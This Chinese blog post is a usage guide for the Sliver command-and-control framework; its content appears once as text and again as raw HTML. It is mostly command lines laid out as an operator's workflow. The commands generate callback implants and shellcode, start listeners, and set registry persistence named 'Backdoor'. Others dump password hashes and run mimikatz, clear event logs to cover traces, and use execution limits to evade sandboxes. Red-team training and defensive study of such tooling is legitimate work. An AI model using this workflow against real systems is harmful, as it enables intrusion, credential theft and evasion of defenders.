SliverC2:基础使用

博主： BushSEC
发布时间：2025 年 02 月 16 日
48 次浏览
暂无评论
6119字数
分类：技术博文

AI摘要：本文介绍了新兴的C2工具Sliver的基础使用，包括常规和通用命令，以及多人协作命令，并提供了生成植入程序、设置监听器、管理会话、文件操作、持久化、横向移动、信息收集等操作示例。

之前博主一直使用的是cs,我们来瞧瞧新兴的C2工具Sliver怎么用
如何## 首先是常规用法 --help命令

1. 常用命令

clear: 清除终端屏幕。
exit: 退出 Sliver 的交互式 Shell。
help: 显示命令帮助信息。例如，help generate 会显示 generate 命令的详细用法。
monitor: 监控威胁情报平台，检测 Sliver 植入程序是否被发现。
wg-config: 生成一个新的 WireGuard 客户端配置文件。
wg-portfwd: 列出通过 WireGuard 隧道接口转发的端口。
wg-socks: 列出在 WireGuard 隧道接口上监听的 SOCKS 服务器。

2. 通用命令

aliases: 列出当前定义的别名（命令的快捷方式）。
armory: 自动下载和安装扩展或别名。
background: 将一个活动的会话放到后台运行。
beacons: 管理 Beacon（一种异步的、持久化的植入程序）。
builders: 列出外部构建器（用于生成植入程序）。
canaries: 列出之前生成的 Canary（用于检测是否被发现）。
cursed: Chrome/Electron 后渗透工具包，用于浏览器攻击。
dns: 启动一个 DNS 监听器（用于 DNS C2）。
env: 列出环境变量。
generate: 生成一个植入程序二进制文件。
hosts: 管理主机数据库（记录目标主机的信息）。
http: 启动一个 HTTP 监听器。
https: 启动一个 HTTPS 监听器。
implants: 列出已生成的植入程序。
jobs: 任务控制（管理后台运行的监听器或任务）。
licenses: 显示开源许可证信息。
loot: 管理服务器的战利品存储（保存从目标获取的数据）。
mtls: 启动一个 mTLS（双向 TLS）监听器。
prelude-operator: 管理与 Prelude Operator 的连接。
profiles: 列出现有的配置文件（用于生成植入程序）。
reaction: 管理对事件的自动反应（例如，当某个事件发生时自动执行某些操作）。
regenerate: 重新生成一个植入程序。
sessions: 会话管理（列出和管理当前的会话）。
settings: 管理客户端设置。
stage-listener: 启动一个分阶段监听器（用于分阶段植入程序）。
tasks: Beacon 任务管理（管理异步任务）。
update: 检查 Sliver 的更新。
use: 切换当前的会话或 Beacon。
version: 显示 Sliver 的版本信息。
websites: 托管静态内容（用于 HTTP C2）。
wg: 启动一个 WireGuard 监听器。

3. 多人协作命令

kick-operator: 将某个操作员从服务器踢出。
multiplayer: 启用多人协作模式（允许多个操作员同时使用 Sliver）。
new-operator: 创建一个新的操作员配置文件。
operators: 管理操作员（列出、添加或删除操作员）。

4. 使用示例

以下是一些常见的使用场景和命令示例：

生成植入程序

generate --os windows --arch amd64 --http http://192.168.1.100:8080

生成一个 Windows 64 位的植入程序，并通过 HTTP C2 通信。

启动 HTTP 监听器

http --domain example.com --port 8080

启动一个 HTTP 监听器，监听 example.com:8080。

管理会话

sessions

列出当前的所有会话。

use <session-id>

切换到指定的会话。

管理 Beacon

beacons

列出当前的所有 Beacon。

use <beacon-id>

切换到指定的 Beacon。

多人协作

multiplayer

启用多人协作模式。

new-operator --name alice

为操作员 alice 创建一个新的配置文件。

1. 生成 Payload

生成 Windows 可执行文件

generate --format exe --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/payload.exe

生成 Linux 可执行文件

generate --format elf --os linux --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/payload.elf

生成 Shellcode

generate --format shellcode --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/shellcode.bin

生成 PowerShell 脚本

generate --format ps1 --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/payload.ps1

2. 设置监听器

启动 mTLS 监听器

mtls --lhost 192.168.52.128 --lport 8443

启动 HTTP 监听器

http --lhost 192.168.52.128 --lport 80

启动 HTTPS 监听器

https --lhost 192.168.52.128 --lport 443

3. 管理会话

查看所有会话

sessions

进入会话

use <Session ID>

获取命令行 Shell

shell

退出会话

exit

终止会话

kill <Session ID>

终止所有会话

kill-all

4. 文件操作

列出文件

ls C:\

下载文件

download C:\path\to\file

上传文件

upload /path/to/local/file C:\path\to\remote\file

删除文件

rm C:\path\to\file

5. 持久化

创建持久化任务

persist --method registry --name "Backdoor" --path "C:\path\to\payload.exe"

查看持久化任务

persist

删除持久化任务

persist --remove <Task ID>

6. 横向移动

执行命令

execute notepad.exe

上传并执行文件

upload /path/to/local/file C:\path\to\remote\file
execute C:\path\to\remote\file

抓取密码哈希

hashdump

抓取明文密码

mimikatz

7. 信息收集

以下是常用命令组合：

获取系统信息

info

获取网络配置

ifconfig

获取进程列表

ps

当前权限

whoami

删除日志

clearev

删除文件

rm C:\path\to\file

删除持久化任务

persist --remove <Task ID>

9. 其他常用命令

查看帮助

help

查看当前配置

config

查看任务

jobs

终止任务

jobs --kill <Job ID>

10. 完整操作流程

启动监听器：

mtls --lhost 192.168.52.128 --lport 8443

生成 Payload：

generate --format exe --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /tmp/payload.exe

部署 Payload 到目标机器。
查看会话：
```
sessions
```
进入会话：
```
use 1
```
获取 Shell：
```
shell
```
清理痕迹：
```
clearev
```

生成shell:

generate --mtls <Server IP> --save ./test.exe --os Windows

生成beacon,采用mtls回连的端口

generate beacon --arch amd64 --os windows --mtls IP:port --save .

时间会有点长，因为要混淆，大概输出结果如下

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:01:05
[*] Implant saved to /xxx/DIFFICULT_DYNAMO.exe

创建Stager(shellcode)

generate stager --lhost 127.0.0.1 --lport 8443 --arch amd64 --format c

通过原生sliver的一个过沙箱的思路

-w, --limit-datetime string：限制在指定日期时间之前执行
-x, --limit-domainjoined：限制在域加入的计算机上执行
-F, --limit-fileexists string：限制在具有文件系统中的指定文件的主机上执行
-z, --limit-hostname string：限制在指定的主机名上执行
-L, --limit-locale string：限制在与此区域设置匹配的主机上执行
-y, --limit-username string：限制在指定的用户名上执行

本文为博主由参考文档整理而成： Sliver C2 官方文档。

最后修改：2025 年 02 月 22 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

SliverC2:基础使用

BushSEC • 2025 年 02 月 16 日

<blockquote class="aisummary"><strong>AI摘要：</strong>本文介绍了新兴的C2工具Sliver的基础使用，包括常规和通用命令，以及多人协作命令，并提供了生成植入程序、设置监听器、管理会话、文件操作、持久化、横向移动、信息收集等操作示例。<br /><br /></a></blockquote><p>之前博主一直使用的是cs,我们来瞧瞧新兴的C2工具Sliver怎么用<br>如何## 首先是常规用法 --help命令</p><h3><strong>1. 常用命令</strong></h3><ul><li><strong><code>clear</code></strong>: 清除终端屏幕。</li><li><strong><code>exit</code></strong>: 退出 Sliver 的交互式 Shell。</li><li><strong><code>help</code></strong>: 显示命令帮助信息。例如，<code>help generate</code> 会显示 <code>generate</code> 命令的详细用法。</li><li><strong><code>monitor</code></strong>: 监控威胁情报平台，检测 Sliver 植入程序是否被发现。</li><li><strong><code>wg-config</code></strong>: 生成一个新的 WireGuard 客户端配置文件。</li><li><strong><code>wg-portfwd</code></strong>: 列出通过 WireGuard 隧道接口转发的端口。</li><li><strong><code>wg-socks</code></strong>: 列出在 WireGuard 隧道接口上监听的 SOCKS 服务器。</li></ul><hr><h3><strong>2. 通用命令</strong></h3><ul><li><strong><code>aliases</code></strong>: 列出当前定义的别名（命令的快捷方式）。</li><li><strong><code>armory</code></strong>: 自动下载和安装扩展或别名。</li><li><strong><code>background</code></strong>: 将一个活动的会话放到后台运行。</li><li><strong><code>beacons</code></strong>: 管理 Beacon（一种异步的、持久化的植入程序）。</li><li><strong><code>builders</code></strong>: 列出外部构建器（用于生成植入程序）。</li><li><strong><code>canaries</code></strong>: 列出之前生成的 Canary（用于检测是否被发现）。</li><li><strong><code>cursed</code></strong>: Chrome/Electron 后渗透工具包，用于浏览器攻击。</li><li><strong><code>dns</code></strong>: 启动一个 DNS 监听器（用于 DNS C2）。</li><li><strong><code>env</code></strong>: 列出环境变量。</li><li><strong><code>generate</code></strong>: 生成一个植入程序二进制文件。</li><li><strong><code>hosts</code></strong>: 管理主机数据库（记录目标主机的信息）。</li><li><strong><code>http</code></strong>: 启动一个 HTTP 监听器。</li><li><strong><code>https</code></strong>: 启动一个 HTTPS 监听器。</li><li><strong><code>implants</code></strong>: 列出已生成的植入程序。</li><li><strong><code>jobs</code></strong>: 任务控制（管理后台运行的监听器或任务）。</li><li><strong><code>licenses</code></strong>: 显示开源许可证信息。</li><li><strong><code>loot</code></strong>: 管理服务器的战利品存储（保存从目标获取的数据）。</li><li><strong><code>mtls</code></strong>: 启动一个 mTLS（双向 TLS）监听器。</li><li><strong><code>prelude-operator</code></strong>: 管理与 Prelude Operator 的连接。</li><li><strong><code>profiles</code></strong>: 列出现有的配置文件（用于生成植入程序）。</li><li><strong><code>reaction</code></strong>: 管理对事件的自动反应（例如，当某个事件发生时自动执行某些操作）。</li><li><strong><code>regenerate</code></strong>: 重新生成一个植入程序。</li><li><strong><code>sessions</code></strong>: 会话管理（列出和管理当前的会话）。</li><li><strong><code>settings</code></strong>: 管理客户端设置。</li><li><strong><code>stage-listener</code></strong>: 启动一个分阶段监听器（用于分阶段植入程序）。</li><li><strong><code>tasks</code></strong>: Beacon 任务管理（管理异步任务）。</li><li><strong><code>update</code></strong>: 检查 Sliver 的更新。</li><li><strong><code>use</code></strong>: 切换当前的会话或 Beacon。</li><li><strong><code>version</code></strong>: 显示 Sliver 的版本信息。</li><li><strong><code>websites</code></strong>: 托管静态内容（用于 HTTP C2）。</li><li><strong><code>wg</code></strong>: 启动一个 WireGuard 监听器。</li></ul><hr><h3><strong>3. 多人协作命令</strong></h3><ul><li><strong><code>kick-operator</code></strong>: 将某个操作员从服务器踢出。</li><li><strong><code>multiplayer</code></strong>: 启用多人协作模式（允许多个操作员同时使用 Sliver）。</li><li><strong><code>new-operator</code></strong>: 创建一个新的操作员配置文件。</li><li><strong><code>operators</code></strong>: 管理操作员（列出、添加或删除操作员）。</li></ul><hr><h3><strong>4. 使用示例</strong></h3><p>以下是一些常见的使用场景和命令示例：</p><h4><strong>生成植入程序</strong></h4><pre><code class="lang-bash">generate --os windows --arch amd64 --http http://192.168.1.100:8080</code></pre><ul><li>生成一个 Windows 64 位的植入程序，并通过 HTTP C2 通信。</li></ul><h4><strong>启动 HTTP 监听器</strong></h4><pre><code class="lang-bash">http --domain example.com --port 8080</code></pre><ul><li>启动一个 HTTP 监听器，监听 <code>example.com:8080</code>。</li></ul><h4><strong>管理会话</strong></h4><pre><code class="lang-bash">sessions</code></pre><ul><li>列出当前的所有会话。</li></ul><pre><code class="lang-bash">use &lt;session-id&gt;</code></pre><ul><li>切换到指定的会话。</li></ul><h4><strong>管理 Beacon</strong></h4><pre><code class="lang-bash">beacons</code></pre><ul><li>列出当前的所有 Beacon。</li></ul><pre><code class="lang-bash">use &lt;beacon-id&gt;</code></pre><ul><li>切换到指定的 Beacon。</li></ul><h4><strong>多人协作</strong></h4><pre><code class="lang-bash">multiplayer</code></pre><ul><li>启用多人协作模式。</li></ul><pre><code class="lang-bash">new-operator --name alice</code></pre><ul><li>为操作员 <code>alice</code> 创建一个新的配置文件。</li></ul><h3><strong>1. 生成 Payload</strong></h3><h4><strong>生成 Windows 可执行文件</strong></h4><pre><code class="lang-bash">generate --format exe --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/payload.exe</code></pre><h4><strong>生成 Linux 可执行文件</strong></h4><pre><code class="lang-bash">generate --format elf --os linux --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/payload.elf</code></pre><h4><strong>生成 Shellcode</strong></h4><pre><code class="lang-bash">generate --format shellcode --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/shellcode.bin</code></pre><h4><strong>生成 PowerShell 脚本</strong></h4><pre><code class="lang-bash">generate --format ps1 --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /path/to/save/payload.ps1</code></pre><h3><strong>2. 设置监听器</strong></h3><h4><strong>启动 mTLS 监听器</strong></h4><pre><code class="lang-bash">mtls --lhost 192.168.52.128 --lport 8443</code></pre><h4><strong>启动 HTTP 监听器</strong></h4><pre><code class="lang-bash">http --lhost 192.168.52.128 --lport 80</code></pre><h4><strong>启动 HTTPS 监听器</strong></h4><pre><code class="lang-bash">https --lhost 192.168.52.128 --lport 443</code></pre><h3><strong>3. 管理会话</strong></h3><h4><strong>查看所有会话</strong></h4><pre><code class="lang-bash">sessions</code></pre><h4><strong>进入会话</strong></h4><pre><code class="lang-bash">use &lt;Session ID&gt;</code></pre><h4><strong>获取命令行 Shell</strong></h4><pre><code class="lang-bash">shell</code></pre><h4><strong>退出会话</strong></h4><pre><code class="lang-bash">exit</code></pre><h4><strong>终止会话</strong></h4><pre><code class="lang-bash">kill &lt;Session ID&gt;</code></pre><h4><strong>终止所有会话</strong></h4><pre><code class="lang-bash">kill-all</code></pre><h3><strong>4. 文件操作</strong></h3><h4><strong>列出文件</strong></h4><pre><code class="lang-bash">ls C:\</code></pre><h4><strong>下载文件</strong></h4><pre><code class="lang-bash">download C:\path\to\file</code></pre><h4><strong>上传文件</strong></h4><pre><code class="lang-bash">upload /path/to/local/file C:\path\to\remote\file</code></pre><h4><strong>删除文件</strong></h4><pre><code class="lang-bash">rm C:\path\to\file</code></pre><h3><strong>5. 持久化</strong></h3><h4><strong>创建持久化任务</strong></h4><pre><code class="lang-bash">persist --method registry --name &quot;Backdoor&quot; --path &quot;C:\path\to\payload.exe&quot;</code></pre><h4><strong>查看持久化任务</strong></h4><pre><code class="lang-bash">persist</code></pre><h4><strong>删除持久化任务</strong></h4><pre><code class="lang-bash">persist --remove &lt;Task ID&gt;</code></pre><h3><strong>6. 横向移动</strong></h3><h4><strong>执行命令</strong></h4><pre><code class="lang-bash">execute notepad.exe</code></pre><h4><strong>上传并执行文件</strong></h4><pre><code class="lang-bash">upload /path/to/local/file C:\path\to\remote\file
execute C:\path\to\remote\file</code></pre><h4><strong>抓取密码哈希</strong></h4><pre><code class="lang-bash">hashdump</code></pre><h4><strong>抓取明文密码</strong></h4><pre><code class="lang-bash">mimikatz</code></pre><h3><strong>7. 信息收集</strong></h3><p>以下是常用命令组合：</p><h4><strong>获取系统信息</strong></h4><pre><code class="lang-bash">info</code></pre><h4><strong>获取网络配置</strong></h4><pre><code class="lang-bash">ifconfig</code></pre><h4><strong>获取进程列表</strong></h4><pre><code class="lang-bash">ps</code></pre><h4><strong>当前权限</strong></h4><pre><code class="lang-bash">whoami</code></pre><h4><strong>删除日志</strong></h4><pre><code class="lang-bash">clearev</code></pre><h4><strong>删除文件</strong></h4><pre><code class="lang-bash">rm C:\path\to\file</code></pre><h4><strong>删除持久化任务</strong></h4><pre><code class="lang-bash">persist --remove &lt;Task ID&gt;</code></pre><h3><strong>9. 其他常用命令</strong></h3><h4><strong>查看帮助</strong></h4><pre><code class="lang-bash">help</code></pre><h4><strong>查看当前配置</strong></h4><pre><code class="lang-bash">config</code></pre><h4><strong>查看任务</strong></h4><pre><code class="lang-bash">jobs</code></pre><h4><strong>终止任务</strong></h4><pre><code class="lang-bash">jobs --kill &lt;Job ID&gt;</code></pre><h3><strong>10. 完整操作流程</strong></h3><ol><li><p><strong>启动监听器</strong>：</p><pre><code class="lang-bash">mtls --lhost 192.168.52.128 --lport 8443</code></pre></li><li><p><strong>生成 Payload</strong>：</p><pre><code class="lang-bash">generate --format exe --os windows --arch amd64 --lhost 192.168.52.128 --lport 8443 --save /tmp/payload.exe</code></pre></li><li><strong>部署 Payload 到目标机器</strong>。</li><li><p><strong>查看会话</strong>：</p><pre><code class="lang-bash">sessions</code></pre></li><li><p><strong>进入会话</strong>：</p><pre><code class="lang-bash">use 1</code></pre></li><li><p><strong>获取 Shell</strong>：</p><pre><code class="lang-bash">shell</code></pre></li><li><p><strong>清理痕迹</strong>：</p><pre><code class="lang-bash">clearev</code></pre></li></ol><h1>生成shell:</h1><pre><code class="lang-bash">generate --mtls &lt;Server IP&gt; --save ./test.exe --os Windows</code></pre><h1>生成beacon,采用mtls回连<IP>的<port>端口</h1><pre><code class="lang-bash">generate beacon --arch amd64 --os windows --mtls IP:port --save .</code></pre><h1>时间会有点长，因为要混淆，大概输出结果如下</h1><pre><code class="lang-bash">[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:01:05
[*] Implant saved to /xxx/DIFFICULT_DYNAMO.exe</code></pre><h1>创建Stager(shellcode)</h1><pre><code class="lang-bash">generate stager --lhost 127.0.0.1 --lport 8443 --arch amd64 --format c</code></pre><h1>通过原生sliver的一个过沙箱的思路</h1><pre><code class="lang-bash">-w, --limit-datetime string：限制在指定日期时间之前执行
-x, --limit-domainjoined：限制在域加入的计算机上执行
-F, --limit-fileexists string：限制在具有文件系统中的指定文件的主机上执行
-z, --limit-hostname string：限制在指定的主机名上执行
-L, --limit-locale string：限制在与此区域设置匹配的主机上执行
-y, --limit-username string：限制在指定的用户名上执行</code></pre><p>本文为博主由参考文档整理而成： <span class="external-link"><a class="no-external-link" href="https://github.com/BishopFox/sliver/wiki" target="_blank"><i data-feather="external-link"></i>Sliver C2 官方文档</a></span>。</p>

1. 常用命令

2. 通用命令

3. 多人协作命令

4. 使用示例

生成植入程序

启动 HTTP 监听器

管理会话

管理 Beacon

多人协作

1. 生成 Payload

生成 Windows 可执行文件

生成 Linux 可执行文件

生成 Shellcode

生成 PowerShell 脚本

2. 设置监听器

启动 mTLS 监听器

启动 HTTP 监听器

启动 HTTPS 监听器

3. 管理会话

查看所有会话

进入会话

获取命令行 Shell

退出会话

终止会话

终止所有会话

4. 文件操作

列出文件

下载文件

上传文件

删除文件

5. 持久化

创建持久化任务

查看持久化任务

删除持久化任务

6. 横向移动

执行命令

上传并执行文件

抓取密码哈希

抓取明文密码

7. 信息收集

获取系统信息

获取网络配置

获取进程列表

当前权限

删除日志

删除文件

删除持久化任务

9. 其他常用命令

查看帮助

查看当前配置

查看任务

终止任务

10. 完整操作流程

生成shell:

生成beacon,采用mtls回连的端口

时间会有点长，因为要混淆，大概输出结果如下

创建Stager(shellcode)

通过原生sliver的一个过沙箱的思路

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

SliverC2:基础使用

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款